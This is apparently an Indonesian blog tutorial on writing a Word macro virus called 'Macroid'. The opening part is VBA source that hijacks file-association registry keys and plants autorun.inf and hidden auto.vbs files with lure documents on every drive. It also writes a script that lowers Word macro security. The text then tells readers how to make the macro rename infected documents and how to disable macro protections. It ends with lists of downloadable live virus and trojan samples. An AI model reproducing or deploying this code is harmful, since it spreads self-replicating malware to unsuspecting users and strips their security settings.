<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\txtfile\shell\open\command\, Winword.exe &amp; Environ$(windir) &amp; \Macroid.doc</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\scrfile\shell\open\command\, Winword.exe &amp; Environ$(windir) &amp; \Macroid.doc</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\batfile\shell\open\command\, Winword.exe &amp; Environ$(windir) &amp; \Macroid.doc</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\Folder\shell\, 0pen</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\Folder\shellpen\, &amp;Open</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\Folder\shellpen\command\, wscript.exe &amp; Environ$(windir) &amp; \avmc.vbs</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\VisualBasic.Project\shell\open\command\, Winword.exe &amp; Environ$(windir) &amp; \Macroid.doc</span>
1
<span style="color: #ff0000;">On Error Resume Next</span>
1
<span style="color: #ff0000;">Dim rog As Integer</span>
1
<span style="color: #ff0000;">Dim atr, vbs, Tipu(10), Trik(10) As String</span>
1
<span style="color: #ff0000;">For a = 66 To 90</span>
1
<span style="color: #ff0000;">partisi = Chr$(a)</span>
1
<span style="color: #ff0000;">vbs = partisi &amp; :\auto.vbs</span>
1
<span style="color: #ff0000;">atr = partisi &amp; :\autorun.inf</span>
1
<span style="color: #ff0000;">Tipu(1) = partisi &amp; :\Soal SPMB 1995-2008.doc</span>
1
<span style="color: #ff0000;">Tipu(2) = partisi &amp; :\Kisah di balik HarryPotter.doc</span>
1
<span style="color: #ff0000;">Tipu(3) = partisi &amp; :\Titip File sebentar.doc</span>
1
<span style="color: #ff0000;">Tipu(4) = partisi &amp; :\jangan di baca.doc</span>
1
<span style="color: #ff0000;">Tipu(5) = partisi &amp; :\buku harian.doc</span>
1
<span style="color: #ff0000;">Tipu(6) = partisi &amp; :\cerita hangat.doc</span>
1
<span style="color: #ff0000;">Tipu(7) = partisi &amp; :\Punya Baim.doc</span>
1
<span style="color: #ff0000;">Tipu(8) = partisi &amp; :\Teka-teki yang baru.doc</span>
1
<span style="color: #ff0000;">Tipu(9) = partisi &amp; :\Kumpulan cerita lucu.doc</span>
1
<span style="color: #ff0000;">Tipu(10) = partisi &amp; :\Trik Sulap.doc</span>
1
<span style="color: #ff0000;">If Dir(Tipu(1)) = “” And Dir(Tipu(2)) = “” And Dir(Tipu(3)) = “” And Dir(Tipu(4)) = “” And Dir(Tipu(5)) = “” And Dir(Tipu(6)) = “” And Dir(Tipu(7)) = “” And Dir(Tipu(8)) = “” And Dir(Tipu(9)) = “” And Dir(Tipu(10)) = “” Then</span>
1
<span style="color: #ff0000;">Randomize</span>
1
<span style="color: #ff0000;">rog = Int(10 * Rnd) + 1</span>
1
<span style="color: #ff0000;">Open Tipu(rog) For Output As #1</span>
1
<span style="color: #ff0000;">Print #1, “”</span>
1
<span style="color: #ff0000;">Close #1</span>
1
<span style="color: #ff0000;">End If</span>
1
<span style="color: #ff0000;">Trik(1) = partisi &amp; :\Novel J.K.Rowling.doc</span>
1
<span style="color: #ff0000;">Trik(2) = partisi &amp; :\cerita cinta.doc</span>
1
<span style="color: #ff0000;">Trik(3) = partisi &amp; :\Ringkasan cerita HarryPotter.doc</span>
1
<span style="color: #ff0000;">Trik(4) = partisi &amp; :\Semua Cheat game DOTA.doc</span>
1
<span style="color: #ff0000;">Trik(5) = partisi &amp; :\Kumpulan Cheat game.doc</span>
1
<span style="color: #ff0000;">Trik(6) = partisi &amp; :\Cheat game RF.doc</span>
1
<span style="color: #ff0000;">Trik(7) = partisi &amp; :\Cheat game Ayo Dance.doc</span>
1
<span style="color: #ff0000;">Trik(8) = partisi &amp; :\Goosebumps.doc</span>
1
<span style="color: #ff0000;">Trik(9) = partisi &amp; :\FearStreet.doc</span>
1
<span style="color: #ff0000;">Trik(10) = partisi &amp; :\R.L.Stine.doc</span>
1
<span style="color: #ff0000;">If Dir(Trik(1)) = “” And Dir(Trik(2)) = “” And Dir(Trik(3)) = “” And Dir(Trik(4)) = “” And Dir(Trik(5)) = “” And Dir(Trik(6)) = “” And Dir(Trik(7)) = “” And Dir(Trik(8)) = “” And Dir(Trik(9)) = “” And Dir(Trik(10)) = “” Then</span>
1
<span style="color: #ff0000;">Randomize</span>
1
<span style="color: #ff0000;">rogi = Int(10 * Rnd) + 1</span>
1
<span style="color: #ff0000;">Open Trik(rogi) For Output As #1</span>
1
<span style="color: #ff0000;">Print #1, “”</span>
1
<span style="color: #ff0000;">Close #1</span>
1
<span style="color: #ff0000;">End If</span>
1
<span style="color: #ff0000;">Open atr For Output As #1</span>
1
<span style="color: #ff0000;">Print #1, [Autorun]</span>
1
<span style="color: #ff0000;">Print #1, shell\Open\command=wscript.exe auto.vbs</span>
1
<span style="color: #ff0000;">Close #1</span>
1
<span style="color: #ff0000;">SetAttr atr, vbHidden + vbSystem</span>
1
<span style="color: #ff0000;">Open vbs For Output As #1</span>
1
<span style="color: #ff0000;">Print #1, dim a</span>
1
<span style="color: #ff0000;">Print #1, set a = createobject( &amp; Chr(34) &amp; Wscript.shell &amp; Chr(34) &amp; )</span>
1
<span style="color: #ff0000;">Print #1, a.regwrite &amp; Chr(34) &amp; HKCU\Software\Microsoft\Office\10.0\Word\Security\Level &amp; Chr(34) &amp; , &amp; Chr(34) &amp; 1 &amp; Chr(34) &amp; , &amp; Chr(34) &amp; REG_DWORD &amp; Chr(34)</span>
1
<span style="color: #ff0000;">Print #1, a.regwrite &amp; Chr(34) &amp; HKCU\Software\Microsoft\Office\11.0\Word\Security\Level &amp; Chr(34) &amp; , &amp; Chr(34) &amp; 1 &amp; Chr(34) &amp; , &amp; Chr(34) &amp; REG_DWORD &amp; Chr(34)</span>
1
<span style="color: #ff0000;">Print #1, a.regwrite &amp; Chr(34) &amp; HKCU\Software\Microsoft\Office\12.0\Word\Security\Level &amp; Chr(34) &amp; , &amp; Chr(34) &amp; 1 &amp; Chr(34) &amp; , &amp; Chr(34) &amp; REG_DWORD &amp; Chr(34)</span>
1
<span style="color: #ff0000;">Close #1</span>
1
<span style="color: #ff0000;">SetAttr vbs, vbHidden + vbSystem</span>
1
<span style="color: #ff0000;">Next a</span>
1
<span style="color: #ff0000;">End Sub</span>
Hati –hati dengan source diatas. Karena lumayan bikin pening juga. Tapi maaf ya kalo aku gak bisa jelasinnya sekarang. Karena kalo aku jelasin nanti tutorial ini terlalu panjangggggggggggggggg……. Makanya penjelasan mengenai source di atas aku buat di tutorial kedua.
EFEK-EFEK KECIL DAN TANDA-TANDA TERINFEKSI



Nah coba tebak mana file virus dan mana file yang bukan virus!!!!!!!!
Jawabannya lihat di bawah!!

CARA MEMBUAT VIRUS LANJUTAN
Ini nih, dulu saya udah janji untuk ngelanjutin sample virus macro yang saya buat dulu. Di tutorial kali ini saya akan jelasin sedikit demi sedikit untuk mempelajari virus macro ini…
Pernah dengar virus Macroid? Itu adalah salah satu contoh virus macro yang saya buat.
Langsung aja.
Buka visual Basic editor di Tools>macro>visual basic editor ato tekan pada keyboard Alt+F11
Tampilannya mirip dengan VB6 kita, dan penggunaan sourcenya juga gak jauh beda…
Misalnya :
Dim AD as object
Ya gak. Mirip kan dengan script di VB6? Dan dilanjutkan dengan penggunaan ”set”. Misalnya :
set AD=ActiveDocument.VBProject.VBComponents.Item(1)
ha ha ha… oke deh gak usah main-main. Langsung keserius nya aja…
Script dibawah ini untuk mengubah ”Name” document yang diinfeksi (umumnya ini yang dijadikan sebagai nama virus macro kita)
1
<span style="color: #ff0000;">dim AD as object set AD=ActiveDocument.VBProject.VBComponents.Item(1)</span>
1
<span style="color: #ff0000;">if AD.Name Macroid then AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines AD.Name = Macroid end if</span>
contoh script diatas adalah untuk mengubah name document menjadi ”Macroid”. (efek ini baru bisa dijalankan setelah virus yang utuh dieksekusi)
Script diatas bisa kamu sisipkan di ”Document_Close()” ato di ”Document_Open()” ato di ”Document_New()”
Kalo disisipkan di “Document_Close()” efeknya akan berjalan saat document ditutup. Dan begitu juga dengan “Document_Open()” dan “Document_new()”
Kalo disisipkan di “Document_Open()” efeknya akan berjalan saat document dibuka.
Kalo disisipkan di “Document_new()” efeknya akan aberjalan saat document baru dibuka.
Ini contoh gambarnya…
image002
Efeknya adalah ini.

Itu tandanya virus “Macroid”!!! ha ha ha… oke.
Sebenarnya saya mau menjelaskan lebih banyak soal trik-trik virus macro, tapi saya yakin sebelum sampai diatas pasti masih banyak masalah untuk kalian…
Sebelumnya kalian harus perhatikan security macro kalian.
Lihat Tools>Macro>security
image006
Yang harus kita pilih adalah opsi ”Low” supaya Ms.Word akan menjalankan semua script di visual Basic Editor. Karena kita masih belajar-belajar biarkan saja kita yang atur security ini, nanti kalo kita udah mau bikin virus macro, ada caranya supaya virus kita yang ngatur security ini… tenang aja…
Setelah kita set securitynya, silakan save document terus hidupkan document kita tadi.
Ada satu lagi masalah… kalo nanti ”misalnya” ada gambar seperti dibawah ini:
image010
Berarti ada hal yang harus kita atur dulu… Buka lagi security macro tadi.
Lalu pada tab Trusted Publishers silakan ceklis “Trust aceess to Visual Basic Project”
Nah klo itu dah dilakukan, maka untuk berikut-berikutnya kalo kita mau ngetes virus macro kita udah bisa boss….
Sekian dulu tutorialnya, tunggu tutorial berikutnya ya….

DOWNLOAD KUMPULAN VIRUS UNTUK DI OPREK-OPREK

Koleksi Virus Agustus 2009
Rh354 sampel.rar
SAMPEL-RECYCLER(VMX).rar
Vir A-25-8-09_ By Neo Bekabe.zip
y-aorsli.autorun.worm.rar
y-new.malware.A.rar
y-new.malware.B.rar
y-Spy.tool.rar
y-trojan.agent2.rar
y-trojan.dropper.rar
y-Trojan.murlo.rar
y-trojan.regrun.rar
y-worm.autoit.rar
y-worm.generic.b.rar
y-worm.generic.rar
Koleksi Virus September 2009
(2) trojan.generic.zip
comwarior.c.zip
conficker.rar
sality.zip
SampelvirusRecycler.zip
SampelvirusRecycler.zip
Sample virus.zip
SimbOS.sebelo.zip
SymbOS-Fontal.A.zip
trojan.generic.zip
Virus by Neo BeKaBe_09-09.zip
Virus Ganas.tar.gz
Virus.Win32.Sality.p.zip
Virus.Win32.Sality.q.zip
Virus.Win32.TeddyBear.zip
y-infected.suspected.zip
y-psw.online.games.zip
y-Sality.Suspected.rar
y-sality.varian.rar
y-sality.varian.yudha.rar
y-suspected.virus.zip
y-trojan-agent.zip
y-trojan.agen.lagi.zip
y-trojan.delf.zip
y-trojan.VB.ITN.zip
y-virus.cacing.zip
y-virus.pwrszr.warnet.b.zip
y-virus.pwrszr.warnet.zip
y-virus.winlib32.warnet.zip
y-zndll.warnet.rar
Koleksi Virus Oktober 2009
y-Ciluka.B.rar
y-Ciluka.worm.rar
y-Conficker.Variant.rar
y-cuakep.varian.rar
y-Cuakep.virus.zip
y-delf.varian.rar
y-FakeAlert.trojan.zip
y-Falder.trojan.zip
y-FFE.rar
y-FraudPack.trojan.zip
y-HantuRimba.rar
y-kemben.b.rar
y-Kemben.rar
y-new.virus.rar
y-ratnguy.virus.rar
y-RatuFelisha.rar
y-sality.nakal.rar
y-sality.varian.lagi.rar
y-sality.varian.lagi2.rar
y-suspected.ise32.rar
y-suspected.keygen.rar
y-suspected.virus.lagi.rar
y-suspected.virus.rar
y-Symbos.Comwar.rar
y-Symbos.rar
y-Trojan.Acad.rar
y-Trojan.Agent.rar
y-VB-KZN.worm.rar
y-Virus.Jim.zip
y-Virus.VB.rar
y-virut.varian.lagi.rar
y-zola.fakeAV.zip
y.suspected.virus.rar
y.VB.Worm.PDL.rar
y.Virut.varian.zip
Koleksi Virus Bulan November 2009
(2) New Folder.rar
(3) New Folder.rar
autorun.inf,DidugaVirusINF
file terinfeksi oleh virus varian alman by adnan.zip
file terinfeksi virus by adnan.zip
linkinfo.rar
logoff.exe,LogOff
more.rar
New Folder.rar
Sampel virus by coe88.zip
Sampel virus zPharaoh.zip
Setup.rar
y-Alman.Varian.rar
y-Brontok.rar
y-Email.Worm.lagi.rar
y-Email.Worm.rar
y-Nimda.htm.rar
y-Runonce.Lagi.rar
y-Runonce.worm.rar
y-Sality.AA.rar
y-Sality.AM.rar
y-Sality.Injected.rar
y-Sality.lagi.rar
y-Sality.Varian.lagi.rar
y-sality.varian.rar
y-Suspected.Autorun.rar
y-Suspected.Generic.rar
y-Suspected.virus.rar
y-Thumbss.vbs.rar
y-Trafaret.Worm.rar
y-Trojan-Gen.rar
y-Trojan.Gen.Varian.B.rar
y-Trojan.Gen.varian.C.rar
y-Trojan.Gen.varian.rar
y-Virut.Injected.rar
y-Worm.Agent.zip
y-Worm.Agent2.zip
y-Worm.Saber.Autorun.rar
y-Yuyun.Varian.rar
y.GameThief.rar
Koleksi Virus Bulan Desember 2009
(2) y-Suspected.Virus.rar
a-fake file.zip
ABG.Gila.rar
al.rar
autorun.rar
Autorunme.Worm.rar
Backdoor.PHP.Small.o [Kaspersky].rar
BAT.Mita.rar
By Neo_BKB_Setup.exe
Cuakep.Baru.rar
Cuakep.Varian.rar
FlashDiskLock.rar
Gen.Troj.rar
gendel32.Trojan.rar
I miss you. Varian.rar
Infected.Autorun.Worm.rar
m.rar
Malware.by.Shafry.rar
Mita.vbs.rar
Morphirii.rar
MP3.Samson.Worm.rar
msvbvm60.rar
New.Virus.rar
New.virus.rar
Nimda.htm.rar
Playboy.A.rar
Playboy.B.rar
Runonce.Infected.rar
Runonce.Varian.rar
Sadic.vbs.rar
Sample Virus 11 Des 09.zip
Script.New.rar
sgemtx.rar
shireen_sungkar.rar
Smadav 7.3.rar
svchost.7z
Trojan.Downloader.html.rar
Trojan.Lagi.rar
vbs.script.rar
virus Bokep.rar
Virus CoPas by Maxx.rar
Virus.BDEWASA.zip
Virus.item.rar
Virus.rar
Worm.Bagle.AG.2.exe.gz
y-Ardamax.Worm.rar
y-Autorun.Worm.rar
y-Gadis.Ancol.rar
y-Gen.troj.rar
y-JS.Agent.Troj.rar
y-Malingsia.Varian.2.rar
y-Malingsia.Varian.3.rar
y-Malingsia.Varian.rar
y-Sality.Varian.rar
y-Sex.17Tahun.rar
y-Suspected.Virus.rar
y-Trojan.Acad.rar
y-Trojan.Backdoor.rar
y-Trojan.Dropper.rar
y-Trojan.FatalError.rar
y-Trojan.Gen.Lagi.rar
y-Trojan.Gen.rar
y-Trojan.Gen.Varian.rar
y-Virus.Acad.rar
Yuyun.Thumb.lagi.rar
Yuyun.Thumb.Varian.rar
Koleksi Virus Januari 2010
Autoit.Varian.rar
autorunme.Recycler.rar
autorunme.Recycler.zip
bukan virus.rar
Cinta.Laura.Worm.rar
Gen.Troj.Yahoo.B.rar
IRC.Worm.rar
iseng.vbs.rar
New Folder.rar
New.Virus.rar
New.Virus.Undeepfreeze.zip
Nimda.htm.rar
Pharaoh(pass=1234).rar
rad05b8f.zip
Recycler.scr.rar
Recycler.Varian.rar
Sality.Varian.hkcmd.zip
Sality.Varian.lagi.rar
Sality.Varian.rar
Script.vbs.rar
Trojan.Dropper.rar
VIDEO maria OZAWA 2.zip
Vira.Worm.zip
virus ternate.daa
Worm.Gen.rar
Original Source By: Morphic – http://[m-o-r-p-h-i-a-n-s]dotz[w-o-r-d-p-r-e-s-s]dotz[c-o-m]
Label: